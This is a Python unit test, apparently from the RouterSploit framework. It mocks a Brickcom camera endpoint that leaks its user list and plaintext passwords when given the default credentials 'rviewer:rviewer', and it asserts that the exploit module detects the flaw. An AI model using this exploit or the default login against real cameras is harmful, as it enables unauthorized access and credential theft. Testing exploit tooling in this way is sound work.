test_users_cgi_creds_disclosure.py

from flask import request, Response
from base64 import b64decode
from routersploit.modules.exploits.cameras.brickcom.users_cgi_creds_disclosure import Exploit


response = (
    """
    size=4
    User1.index=1
    User1.username=admin
    User1.password=test1234
    User1.privilege=1

    User2.index=2
    User2.username=viewer
    User2.password=viewer
    User2.privilege=0

    User3.index=3
    User3.username=rviewer
    User3.password=rviewer
    User3.privilege=2

    User4.index=0
    User4.username=visual
    User4.password=visual1234
    User4.privilege=0
    """
)


def apply_response(*args, **kwargs):
    if "Authorization" in request.headers.keys():
        creds = str(b64decode(request.headers["Authorization"].replace("Basic ", "")), "utf-8")

        if creds in ["rviewer:rviewer"]:
            return response, 200

    resp = Response("Unauthorized")
    resp.headers["WWW-Authenticate"] = "Basic ABC"
    return resp, 401


def test_check_success(target):
    """ Test scenario - successful check """

    route_mock = target.get_route_mock("/cgi-bin/users.cgi", methods=["GET", "POST"])
    route_mock.side_effect = apply_response

    exploit = Exploit()
    exploit.target = target.host
    exploit.port = target.port

    assert exploit.check() is True
    assert exploit.run() is None